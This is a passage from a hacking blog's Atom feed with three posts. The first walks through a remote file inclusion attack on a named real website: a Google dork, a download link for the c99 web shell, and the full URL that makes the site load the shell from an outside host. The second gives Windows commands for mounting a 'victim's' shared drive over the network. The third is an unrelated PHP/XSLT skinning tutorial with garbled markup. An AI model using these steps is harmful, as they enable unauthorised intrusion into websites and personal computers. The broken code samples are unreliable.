&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Remote
 file&amp;nbsp;inclusion&amp;nbsp;is basically a one of the most common vulnerability 
found in web application. This type of vulnerability allows the Hacker 
or attacker to add a remote file on the web server. If the attacker 
gets&amp;nbsp;successful in performing the attack he/she will gain access to the 
web server and hence can execute any command on it.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;strong&gt;Searching the Vulnerability&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one&lt;/span&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.targetsite.com/index.php?page=Anything&quot; title=&quot;Linkification: http://www.Targetsite.com/index.php?page=Anything&quot;&gt;www.Targetsite.com/index.php?page=Anything&lt;/a&gt;&lt;/em&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;To find the&amp;nbsp;vulnerability&amp;nbsp;the hacker will most commonly &amp;nbsp;use the following Google Dork&lt;/span&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;“inurl:index.php?page=”&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;This will show all the pages which has “&lt;/span&gt;index.php?page=&lt;span style=&quot;font-weight: normal;&quot;&gt;”
 in their URL, Now to test whether the website is vulnerable to Remote 
file Inclusion or not the hacker use the following command&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.targetsite.com/index.php?page=www.google.com&quot; title=&quot;Linkification: http://www.targetsite.com/index.php?page=www.google.com&quot;&gt;www.targetsite.com/index.php?page=www.google.com&lt;/a&gt;&lt;/em&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Lets say that the target website is&amp;nbsp;&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.cbspk.com/&quot; title=&quot;Linkification: http://www.cbspk.com&quot;&gt;http://www.cbspk.com&lt;/a&gt;&lt;/em&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;So the hacker url will become&lt;/span&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.cbspk.com/v2/index.php?page=http://www.google.com&quot; title=&quot;Linkification: http://www.cbspk.com/v2/index.php?page=http://www.google.com&quot;&gt;http://www.cbspk.com/v2/index.php?page=http://www.google.com&lt;/a&gt;&lt;/em&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;If
 after executing the command the homepage of the google shows up then 
then the website is vulnerable to this attack if it does not come up 
then you should look for a new target. In my case after executing the 
above command in the address bar Google homepage shows up indicating 
that the website is vulnerable to this attack&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-weight: normal;&quot;&gt;Now
 the hacker would upload the shells to gain&amp;nbsp;access. The most common 
shells used are c99 shell or r57 shell. I would use c99 shell. You can 
download c99 shell from the link below:&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;/span&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding: 10px;&quot;&gt;
&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829&quot; title=&quot;Linkification: http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829&lt;/span&gt;&lt;/a&gt;&lt;/em&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-weight: normal;&quot;&gt;The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-weight: normal;&quot;&gt;Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding: 10px;&quot;&gt;
&lt;em&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://h1.ripway.com/rafaybaloch/c99.txt&quot; title=&quot;Linkification: http://h1.ripway.com/rafaybaloch/c99.txt&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://h1.ripway.com/rafaybaloch/c99.txt&lt;/span&gt;&lt;/a&gt;&lt;/em&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-weight: normal;&quot;&gt;Now here is how a hacker would execute the following command to gain access&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;blockquote style=&quot;color: #555555; font-style: italic; padding: 10px;&quot;&gt;
&lt;em&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt&quot; title=&quot;Linkification: http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt&quot;&gt;http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt&lt;/a&gt;?&lt;/span&gt;&lt;/em&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-weight: normal;&quot;&gt;Remember
 to add “?” at the end of url or else the shell will not execute. Now 
the hacker is inside the website and he could do anything with it&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/8747626439353608693/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/8747626439353608693'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/8747626439353608693'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html' title='Hack a Website Using Remote File Inclusion'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-7439594466135019135</id><published>2013-01-05T05:52:00.002-08:00</published><updated>2013-07-28T01:47:54.776-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hack computer using ip address"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><title type='text'>Hack Somone&#39;s Computer On Your Network Using His IP Address</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif; line-height: 19px;&quot;&gt;&lt;b&gt;In my previous i have written about &lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Network%20Hacks&quot;&gt;Network Hacking&lt;/a&gt;. In this post i will tell you about how to hack someone ip address if you get someone&#39;s ip address you can easily get in to his system and can day anything you want. You can check &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/get-someones-ip-address-with-their.html&quot;&gt;his location &lt;/a&gt;and also easily access his data.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif; line-height: 19px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif; line-height: 19px;&quot;&gt;&lt;b&gt;Step 1&lt;br /&gt;
First of all,get a good IP scanner.&lt;br /&gt;
&lt;br /&gt;
Step 2&lt;br /&gt;
Now click on start and then go to run and then type there &quot;CMD&quot; and press ok&lt;br /&gt;
&lt;br /&gt;
This is what you see:&lt;br /&gt;
c:\windows&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now this is what you have to do ----&amp;gt;&amp;gt;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace&lt;br /&gt;
an ip address of the victims computer&lt;br /&gt;
&lt;br /&gt;
c:\windows&amp;gt;nbtstat -a 255.255.255.255&lt;br /&gt;
&lt;br /&gt;
If you see this your in NetBIOS Remote Machine Name Table&lt;br /&gt;
&lt;br /&gt;
Name Type Status ---------------------------------------------------------------&lt;br /&gt;
user&lt;00&gt; UNIQUE Registered&lt;br /&gt;
workgroup &lt;00&gt; GROUP Registered&lt;br /&gt;
user &lt;03&gt; UNIQUE Registered&lt;br /&gt;
user &lt;20&gt; UNIQUE Registered&lt;br /&gt;
&lt;br /&gt;
MAC Address = xx-xx-xx-xx-xx-xx&lt;br /&gt;
---------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
If you don&#39;t get the number &lt;20&gt;.&lt;br /&gt;
The victim disabled the File And Printer Sharing, find another victim.&lt;br /&gt;
&lt;br /&gt;
Step 3:&lt;br /&gt;
&lt;br /&gt;
Type down:&lt;br /&gt;
&lt;br /&gt;
c:\windows&amp;gt;net view \\255.255.255.255&lt;br /&gt;
&lt;br /&gt;
If the output is like this:&lt;br /&gt;
&lt;br /&gt;
Shared resources at \\255.255.255.255&lt;br /&gt;
ComputerNameGoesHere&lt;br /&gt;
&lt;br /&gt;
Sharename Type Used as Comment&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------&lt;br /&gt;
CDISK Disk xxxxx xxxxx&lt;br /&gt;
&lt;br /&gt;
The command completed successfully.&lt;br /&gt;
&lt;br /&gt;
&quot;DISK&quot; shows that the victim is sharing a Disk named as CDISK&lt;br /&gt;
&lt;br /&gt;
Step 4&lt;br /&gt;
&lt;br /&gt;
you can replace x: by any letter you want but not the letter of your own drive.&lt;br /&gt;
&lt;br /&gt;
CDISK is the name of the shared harddrive.&lt;br /&gt;
&lt;br /&gt;
Now type:&lt;br /&gt;
c:\windows&amp;gt;net use x: \\255.255.255.255\CDISK&lt;br /&gt;
&lt;br /&gt;
If the command is successful you are a small time hacker.&lt;br /&gt;
&lt;br /&gt;
Now open windows explorer or just double click on the My Computer icon on your&lt;br /&gt;
desktop and you will see a new network drive X:.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Note to newbies: This hack will only work if you have the ip of someone 
on your network. It will not work if the ip of the person you want to 
&quot;hack&quot; is not on your network.&lt;br /&gt;
&lt;br /&gt;
Tip: If you can only access your targets shared folder put a batch file 
in their shared folder with the command C=C if they open it,it will 
share their hardrive.&lt;!--20--&gt;&lt;!--20--&gt;&lt;!--03--&gt;&lt;!--00--&gt;&lt;!--00--&gt;&lt;!--20--&gt;&lt;!--20--&gt;&lt;!--03--&gt;&lt;!--00--&gt;&lt;!--00--&gt;&lt;/20&gt;&lt;/20&gt;&lt;/03&gt;&lt;/00&gt;&lt;/00&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/7439594466135019135/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/7439594466135019135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/7439594466135019135'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-ip-address.html' title='Hack Somone&#39;s Computer On Your Network Using His IP Address'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-4677470412818405423</id><published>2013-01-05T05:49:00.002-08:00</published><updated>2013-07-28T01:49:16.300-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><title type='text'>Creating Truly Skinnable Web Sites (ver.1.0.0)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
A few months back, while working on bread5 (my new, at
 that time, ultra-secret web site), I had a thought: wouldn&#39;t it be cool
 if I could serve up bread5 with any look I wanted, without having to 
create entire sites with different layouts by hand. I didn&#39;t want to 
just change the color scheme like most “skinnable” sites; I wanted to 
create completely different looks without going through too much 
trouble. The skin engine that I created for bread5 uses a host of new 
technologies to accomplish its tasks; these technologies include php, 
XML, XSLT, and XHTML. I&#39;ve never seen anyone create dynamic sites that 
are truly skinnable, so this is all new and uncharted territory for me. 
As a result, the method I describe in this article may not be the best 
way to do this, but I think it works very well. This is an advanced 
tutorial. The reader should be familar with PHP and XML.&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
The
 idea is simple: when one wants to create different versions of one&#39;s 
site, all the data is the same, the only thing that has changed is the 
layouts. So joe-webmaster makes up some layouts then goes at the task of
 copying-and-pasting his site&#39;s data into these layouts. He does this 
over and over for every page on his site. There must be a better 
way—there is. Since the site&#39;s data (such as product information) is the
 same for every layout, put all the data in an XML file and transform 
the data into the completely different layouts using XSLT. So, if I 
wanted to create a new skin for bread5, all I would have to do is create
 a few XSL files for the skin, upload it to the server, and it&#39;s done; 
the user can choose whichever skin he or she wants to view the site in. 
Using this method, you can increase the accessibility of your site just 
by creating screen reader and WAP compatible skins. In a few minutes 
your site can now be easily accessed by a women using her cell phone, or
 a blind man sitting at home.&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
To get started, take your data and put it in an XML file. For example, a site&#39;s index page might look like this:&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;&lt;mysite page=&quot;index&quot; title=&quot;Welcome to my site!&quot;&gt;&lt;linkbar&gt;
    &lt;item type=&quot;link&quot;&gt;

      &lt;uri&gt;./faq.php&lt;/uri&gt;

      &lt;title&gt;FAQ&lt;/title&gt;

      &lt;desc&gt;Frequently Asked Questions about this site&lt;/desc&gt;

    &lt;/item&gt;

    &lt;item type=&quot;form&quot;&gt;

      &lt;action&gt;./search.php&lt;/action&gt;

      &lt;method&gt;post&lt;/method&gt;

      &lt;input maxlength=&quot;100&quot; name=&quot;search&quot; type=&quot;text&quot; /&gt;

    &lt;/item&gt;

    &lt;!-- other links --&gt;

  &lt;/linkbar&gt; 

  &lt;greeting&gt;

    &lt;para&gt;

      Welcome to my site!

    &lt;/para&gt;

    &lt;para&gt;

      Please check out all the sections.

    &lt;/para&gt;

  &lt;/greeting&gt;

  &lt;news&gt;

    &lt;news-story&gt;

      &lt;date&gt;November 29, 2001&lt;/date&gt;

      &lt;story&gt;Some stuff happened.&lt;/story&gt;

    &lt;/news-story&gt;

    &lt;news-story&gt;

      &lt;date&gt;November 30, 2001&lt;/date&gt;

      &lt;story&gt;Some more stuff happened.&lt;/story&gt;

    &lt;/news-story&gt;

  &lt;/news&gt;

&lt;/mysite&gt;
&lt;/pre&gt;
&lt;/div&gt;
Looks pretty simple, but it can be improved upon to make it 
even easier for us to maintain. Instead of adding a news story by 
manually editing the file, I&#39;d like to pull the stories out of my 
database. That way, I can create a simple script to put my news in the 
database and then I can easily add news stories without having to FTP in
 to the server and edit the file.&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
We&#39;ll be using php&#39;s XSLT extension, Sablotron, to 
transform the XML file (discussed later on), so why not use its power to
 add dynamic content to the XML file also? It&#39;s easy to do. Just have 
php hold the XML data, pass it to Sablotron and have it pass the data to
 the XSL file. For example, to pull news stories out of a MySQL database
 and have it added to the XML file, we would do the following:&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;// code to connect to the database and pull the stories omitted for brevity.

// $db_query holds an SQL query to pull news stories out of the database. 

$xsltArgs[&quot;stories&quot;]=&quot;&lt;news-story&gt;&quot;;



while($row= mysql_fetch_array($db_query)

{

  $date= $row[&quot;date&quot;];

  $story= $row[&quot;story&quot;];



  $xsltArgs[&quot;stories&quot;].=&quot;

      &lt;date&gt;$date&lt;/date&gt;

      &lt;story&gt;$story&lt;/story&gt;&quot;;

}



$xsltArgs[&quot;stories&quot;].=&quot;&lt;/news-story&gt;&quot;;
&lt;/pre&gt;
&lt;/div&gt;
$xsltArgs is an array. $xsltArgs[&quot;stories&quot;] holds the XML 
for the news stories. This variable will be used later when the 
transformation takes place. If you want to add more dynamic data to your
 site, store it as XML in another slot of the array.&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
Now that we&#39;ve created the XML file for the index 
page, we can create an XSL file that will be used by Sablotron to 
transform the XML file. Here is an XSL file that will transform the XML 
file into a simple XHTML web page.&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;

&lt;xsl:stylesheet href=&quot;http://www.w3.org/1999/XSL/Transform&quot; linkification-ext=&quot;linkification-ext&quot; title=&quot;Linkification: http://www.w3.org/1999/XSL/Transform&quot; version=&quot;1.0&quot; xmlns:xsl=&quot;&amp;lt;a class=&quot;&gt;http://www.w3.org/1999/XSL/Transform&lt;/xsl:stylesheet&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/div&gt;
&quot;&amp;gt;

  &lt;xsl:output encoding=&quot;utf-8&quot; indent=&quot;yes&quot; method=&quot;xhtml&quot;&gt;

 

  &lt;xsl:template match=&quot;/&quot;&gt;

    &lt;html href=&quot;http://www.w3.org/1999/xhtml&quot; linkification-ext=&quot;linkification-ext&quot; title=&quot;Linkification: http://www.w3.org/1999/xhtml&quot; xmlns=&quot;&amp;lt;a class=&quot;&gt;http://www.w3.org/1999/xhtml&lt;/html&gt;&lt;/xsl:template&gt;&lt;/xsl:output&gt;&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&amp;gt;

    &lt;head&gt;

      &lt;title&gt;My Web Site - &lt;xsl:value-of select=&quot;mySite/@title&quot; /&gt;&lt;/title&gt;

      

      

      

      

      

      &lt;link href=&quot;main.css&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot;&gt;&lt;/link&gt;

    &lt;/head&gt;

  

    &lt;body&gt;

      &lt;br /&gt;

      &lt;xsl:call-template name=&quot;linkbar&quot;&gt;

      &lt;br /&gt;

      &lt;xsl:call-template name=&quot;content&quot;&gt;

    &lt;/xsl:call-template&gt;&lt;/xsl:call-template&gt;&lt;/body&gt;

    

  

 

  &lt;xsl:template name=&quot;linkbar&quot;&gt;

    &lt;xsl:for-each select=&quot;mySite/sidebar/item&quot;&gt;

      &lt;xsl:if test=&quot;@type=&amp;quot;link&amp;quot;&quot;&gt;

        &lt;a href=&quot;http://www.blogger.com/%7Buri%7D&quot; title=&quot;{desc}&quot;&gt;&lt;xsl:value-of select=&quot;title&quot;&gt;&lt;/xsl:value-of&gt;&lt;/a&gt;&lt;br /&gt;

      &lt;/xsl:if&gt;

      &lt;xsl:if test=&quot;@type=&amp;quot;form&amp;quot;&quot;&gt;

        &lt;/xsl:if&gt;&lt;/xsl:for-each&gt;&lt;/xsl:template&gt;&lt;br /&gt;
&lt;form action=&quot;{action}&quot; method=&quot;{method}&quot;&gt;
&lt;xsl:for-each select=&quot;input&quot;&gt;

            &lt;input class=&quot;search&quot; maxlength=&quot;{@maxlength}&quot; name=&quot;{@name}&quot; size=&quot;10&quot; type=&quot;{@type}&quot; value=&quot;Search&quot; /&gt;

          &lt;/xsl:for-each&gt;

        &lt;/form&gt;
&lt;xsl:template name=&quot;content&quot;&gt;

    &lt;strong&gt;&lt;xsl:value-of select=&quot;mySite/@page&quot;&gt;&lt;/xsl:value-of&gt;&lt;/strong&gt;

    &lt;br /&gt;

    &lt;xsl:for-each select=&quot;mySite/greeting/para&quot;&gt;

      

        &lt;xsl:value-of select=&quot;.&quot;&gt;

      &lt;/xsl:value-of&gt;&lt;br /&gt;


    &lt;/xsl:for-each&gt;

      &lt;hr align=&quot;center&quot; width=&quot;454&quot; /&gt;

      &lt;span class=&quot;news&quot;&gt;News::&lt;/span&gt;

      &lt;br /&gt;

      &lt;div class=&quot;news&quot;&gt;
&lt;xsl:for-each select=&quot;document(&#39;arg:/stories&#39;)/news-story&quot;&gt;

          &lt;span class=&quot;newstime&quot;&gt;&lt;xsl:value-of select=&quot;date&quot;&gt;&lt;/xsl:value-of&gt;&lt;/span&gt;

          &lt;/xsl:for-each&gt;&lt;br /&gt;
&lt;div class=&quot;newsitem&quot;&gt;
&lt;xsl:value-of select=&quot;story&quot;&gt;

          &lt;/xsl:value-of&gt;&lt;/div&gt;
&lt;br /&gt;

        

      &lt;/div&gt;
&lt;/xsl:template&gt;

 


You could repeat this and create many different XSL files to
 output many different pages (such as a WML page for viewing on a WAP 
enabled device). If you stored more dynamic content in another slot of 
the $xsltArg array, you can retrieve it in your XSL file by using:&lt;br /&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;document(&#39;arg:/&lt;name of=&quot;of&quot; slot=&quot;slot&quot;&gt;&#39;)
&lt;/name&gt;&lt;/pre&gt;
&lt;/div&gt;
where &lt;name of=&quot;of&quot; slot=&quot;slot&quot;&gt; would be the name of the slot in the array.&lt;br /&gt;
&lt;/name&gt;&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
Now all that is left to do is apply the XSL 
transformation to the XML file. To do this, I use php&#39;s XSLT extension, 
Sablotron. I should mention that Sablotron is not enabled in default php
 installations. To activate it on a *nix machine, run the following:&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;./configure --enable-xslt --with-xslt-sablot
&lt;/pre&gt;
&lt;/div&gt;
If you&#39;re being hosted by someone else, ask them to do it 
for you. I chose a server side transformation because many browsers lack
 the ability to do transformations on the client end. By doing the 
transformation on the server, you&#39;re guaranteed that the transformation 
will occur.&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
The simplest way to use XSLT in php is to pass the 
path to both the XML file and the XSL file to the xslt_run() function 
like this:&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;// First create an XSLT processor.

$xh= xslt_create();



// $xsl holds the path to the XSL file. $xml holds the path to the XML file.

xslt_run($xh, $xsl, $xml, &quot;arg:/_result&quot;, NULL, $xsltArgs); 



$result= xslt_fetch_result($xh);



// Finally, free the XSLT processor since we&#39;re done using it.

xslt_free($xh);
&lt;/pre&gt;
&lt;/div&gt;
The $result variable will hold the transformed page which you can then output using echo or do whatever else you may want to do.&lt;br /&gt;
&lt;div class=&quot;para&quot;&gt;
The transformation process is a bit different on 
servers running PHP 4.1 and above. I believe, for completeness, I should
 explain how it is done. If you&#39;re running a lower of version of php, 
feel free to skip this part. With the advent of PHP 4.1, a new interface
 to the XSLT engine has been added. Now, to transform an XML file, one 
does the following:&lt;/div&gt;
&lt;div class=&quot;center&quot;&gt;
&lt;pre class=&quot;example&quot;&gt;// First create an XSLT processor.

$xh = xslt_create();



// Next, pass either two variables, one holding the path to an XSL file and one 

// holding the path to an XML file. $result holds the transformed data. 

$result= xslt_process($xh, $xsl, $xml, NULL, $xsltArgs);



// Finally, free the XSLT processor since we&#39;re done using it.

xslt_free($xh);
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class=&quot;para&quot;&gt;
There you have it, a simple way to create 
truly skinnable web sites. What I&#39;ve just described is pretty basic, you
 can improve on it. For example, you can have php automatically 
determine if the user is on a WAP device and have it serve up a WAP 
page. Also, you can create many skins and have a page that displays a 
screen shot of each skin, letting the user choose which one he or she 
wants to view the site with. Then, you can store the user&#39;s choice in a 
cookie, so the next time the user visits the site, the skin he or she 
chose is already applied. I hope you learned a lot from this tutorial 
and start using this technique. As always, if you find any errors or 
have any comments please send them to me (&lt;a href=&quot;mailto:spiderman@witty.com&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot; title=&quot;Click to e-mail me.&quot;&gt;spiderman@witty.com&lt;/a&gt;). Kindly direct questions to the message board. Until next time...&lt;/div&gt;
&lt;h2 style=&quot;font-size: 24px; line-height: 1.2em;&quot;&gt;
Refrences:&lt;/h2&gt;
&lt;ul style=&quot;line-height: 19px; list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;&quot;&gt;
&lt;li style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;a href=&quot;http://www.php.net/manual/en/ref.xslt.php&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot; target=&quot;_blank&quot; title=&quot;Link opens in a new browser window.&quot;&gt;http://www.php.net/manual/en/ref.xslt.php&lt;/a&gt;&lt;/li&gt;
&lt;li style=&quot;list-style-position: outside; margin-left: 1.6em;&quot;&gt;&lt;a href=&quot;http://www.gingerall.com/charlie/ga/act/gadoc.act?pg=sablot&quot; style=&quot;color: #1d81b6; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot; target=&quot;_blank&quot; title=&quot;Link opens in a new browser window.&quot;&gt;http://www.gingerall.com/charlie/ga/act/gadoc.act?pg=sablot&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
